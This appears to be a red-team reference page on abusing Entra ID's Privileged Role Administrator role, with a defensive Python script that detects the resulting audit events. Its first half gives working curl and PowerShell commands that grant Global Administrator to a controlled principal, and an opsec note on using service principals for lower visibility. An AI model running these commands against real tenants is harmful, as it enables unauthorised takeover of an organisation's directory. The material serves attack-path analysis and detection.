AZPrivilegedRoleAdmin
The source principal holds the Privileged Role Administrator role, allowing it to assign any Entra ID admin role to any principal, including Global Administrator.
Applies to: User / ServicePrincipal → AZTenant
Linux Abuse
Assign Global Admin role to controlled principal (curl)
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')
# Get Global Administrator role object ID. directoryRoles lists only roles already activated
# in the tenant; -G/--data-urlencode encodes the spaces in the $filter expression, which curl
# would otherwise send unencoded.
ROLE_ID=$(curl -s -G "https://graph.microsoft.com/v1.0/directoryRoles" \
  --data-urlencode "\$filter=displayName eq 'Global Administrator'" \
  -H "Authorization: Bearer $TOKEN" | jq -r '.value[0].id')
# Assign role
curl -s -X POST "https://graph.microsoft.com/v1.0/directoryRoles/$ROLE_ID/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"
Assign via roleManagement endpoint (unified RBAC)
curl -s -X POST "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "principalId": "<object-id>",
    "roleDefinitionId": "62e90394-69f5-4237-9190-012177145e10",
    "directoryScopeId": "/"
  }'
Windows Abuse
PowerZure: assign admin role
Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Add-AzureADRole -Role 'Global Administrator' -PrincipalId <object-id>
Microsoft.Graph PowerShell
# Microsoft.Graph SDK 2.x expects -AccessToken as a SecureString:
# Connect-MgGraph -AccessToken (ConvertTo-SecureString '<access-token>' -AsPlainText -Force)
Connect-MgGraph -AccessToken <access-token>
# directoryRoles only returns roles that have been activated in the tenant
$role = Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'"
if (-not $role) {
    # Not activated yet: instantiate the role from its template first
    $roleTemplate = Get-MgDirectoryRoleTemplate -Filter "displayName eq 'Global Administrator'"
    $role = New-MgDirectoryRole -RoleTemplateId $roleTemplate.Id
}
New-MgDirectoryRoleMember -DirectoryRoleId $role.Id -DirectoryObjectId <object-id>
Assign via Graph role assignments
$params = @{
    principalId      = "<object-id>"
    roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10" # Global Administrator
    directoryScopeId = "/"
}
New-MgRoleManagementDirectoryRoleAssignment @params
Opsec
- Role assignments are logged in Entra ID audit as "Add member to role" with actor, role, and target.
- Activating the Global Administrator role for a service principal is lower-visibility than adding an interactive user.
- Global Admin role definition ID (static): 62e90394-69f5-4237-9190-012177145e10
- After escalation to Global Admin, follow the AZGlobalAdmin abuse chain.
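The "Add member to role" audit event named above is what a detection rule keys on. The following is an added example and not code from the original page: it parses records shaped like Microsoft Graph `auditLogs/directoryAudits` entries (the field names `activityDisplayName`, `initiatedBy`, `targetResources` and `modifiedProperties` follow that schema; every sample value, principal and timestamp is constructed) and flags grants of Global Administrator or Privileged Role Administrator. It matches on the static template ID first, because the display name can be missing from a record, and rates service-principal targets higher since the Opsec note above marks them as lower-visibility.

```python
"""Flag Global Administrator / Privileged Role Administrator grants in Entra ID audit records.
Added example, not code from the original page. Records follow the shape of Microsoft Graph
auditLogs/directoryAudits entries (activityDisplayName, initiatedBy, targetResources[].modifiedProperties);
every sample value below is constructed."""
import json

GLOBAL_ADMIN_TEMPLATE_ID = "62e90394-69f5-4237-9190-012177145e10"  # static across all tenants
WATCHED_ROLE_NAMES = {"Global Administrator", "Privileged Role Administrator"}


def _prop(name, value):
    # The audit log stores modifiedProperties values as JSON-encoded strings.
    return {"displayName": name, "newValue": json.dumps(value)}


# Constructed sample audit records (not real tenant data).
SAMPLE_AUDIT_RECORDS = [
    {   # 1: user grants Global Administrator to a service principal; the role object is a second target
        "activityDateTime": "2024-05-01T09:15:00Z", "activityDisplayName": "Add member to role", "result": "success",
        "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example", "id": "u-001"}},
        "targetResources": [
            {"id": "sp-042", "displayName": "backup-automation", "type": "ServicePrincipal",
             "modifiedProperties": [_prop("Role.DisplayName", "Global Administrator"),
                                    _prop("Role.TemplateId", GLOBAL_ADMIN_TEMPLATE_ID)]},
            {"id": "role-001", "displayName": "Global Administrator", "type": "Role", "modifiedProperties": []},
        ],
    },
    {   # 2: routine Helpdesk Administrator grant; must not alert (template ID is a constructed placeholder)
        "activityDateTime": "2024-05-01T09:20:00Z", "activityDisplayName": "Add member to role", "result": "success",
        "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example", "id": "u-001"}},
        "targetResources": [{"id": "u-007", "userPrincipalName": "bob@contoso.example", "type": "User",
                             "modifiedProperties": [_prop("Role.DisplayName", "Helpdesk Administrator"),
                                                    _prop("Role.TemplateId", "00000000-0000-0000-0000-000000000001")]}],
    },
    {   # 3: grant made by an application identity; the record carries only the template ID
        "activityDateTime": "2024-05-01T09:25:00Z", "activityDisplayName": "Add member to role", "result": "success",
        "initiatedBy": {"app": {"displayName": "deploy-pipeline", "servicePrincipalId": "sp-100"}},
        "targetResources": [{"id": "u-009", "userPrincipalName": "carol@contoso.example", "type": "User",
                             "modifiedProperties": [_prop("Role.TemplateId", GLOBAL_ADMIN_TEMPLATE_ID)]}],
    },
    {   # 4: failed attempt to grant Privileged Role Administrator; still worth surfacing
        "activityDateTime": "2024-05-01T09:35:00Z", "activityDisplayName": "Add member to role", "result": "failure",
        "initiatedBy": {"user": {"userPrincipalName": "dave@contoso.example", "id": "u-013"}},
        "targetResources": [{"id": "u-021", "userPrincipalName": "erin@contoso.example", "type": "User",
                             "modifiedProperties": [_prop("Role.DisplayName", "Privileged Role Administrator")]}],
    },
]


def _unwrap(value):
    # Decode a JSON-encoded property value; pass None and non-JSON strings through unchanged.
    if value is None:
        return None
    try:
        return json.loads(value)
    except (TypeError, ValueError):
        return value


def actor_of(initiated_by):
    """Name the actor whether the change came from a user or an application identity."""
    user = initiated_by.get("user") or {}
    app = initiated_by.get("app") or {}
    if user.get("userPrincipalName"):
        return user["userPrincipalName"]
    return "app:" + app["displayName"] if app.get("displayName") else "unknown"


def extract_role_grants(records):
    """One normalized entry per principal added by an 'Add member to role' event."""
    grants = []
    for rec in records:
        if rec.get("activityDisplayName") != "Add member to role":
            continue
        for target in rec.get("targetResources", []):
            props = {p.get("displayName"): _unwrap(p.get("newValue")) for p in target.get("modifiedProperties", [])}
            if "Role.DisplayName" not in props and "Role.TemplateId" not in props:
                continue  # the role object itself appears as a target but carries no Role.* properties
            grants.append({
                "time": rec.get("activityDateTime"), "result": rec.get("result"),
                "actor": actor_of(rec.get("initiatedBy", {})),
                "target": target.get("userPrincipalName") or target.get("displayName") or target.get("id"),
                "target_type": target.get("type"),
                "role": props.get("Role.DisplayName"), "role_template_id": props.get("Role.TemplateId"),
            })
    return grants


def find_privileged_grants(records):
    """Keep grants of Global Administrator or Privileged Role Administrator. Match the static template ID
    first (display names can be absent), then the display name. Service-principal targets rate higher
    because they never appear in interactive sign-in reviews."""
    hits = []
    for grant in extract_role_grants(records):
        if grant["role_template_id"] != GLOBAL_ADMIN_TEMPLATE_ID and grant["role"] not in WATCHED_ROLE_NAMES:
            continue
        hits.append(dict(grant, severity="high" if grant["target_type"] == "ServicePrincipal" else "medium"))
    return hits


if __name__ == "__main__":
    for hit in find_privileged_grants(SAMPLE_AUDIT_RECORDS):
        print(f"{hit['time']} [{hit['severity']}] {hit['actor']} -> {hit['target']} ({hit['target_type']}) "
              f"role={hit['role'] or hit['role_template_id']} result={hit['result']}")
```

Run against the constructed records, three of the four grants surface: the service-principal grant (high), the pipeline-initiated grant that only carries the template ID (medium), and the failed Privileged Role Administrator attempt (medium); the Helpdesk Administrator grant is ignored. Wiring the same functions to exported `directoryAudits` JSON, or to the unified RBAC `roleAssignments` path, means keeping the template-ID match as the primary key rather than trusting display names alone.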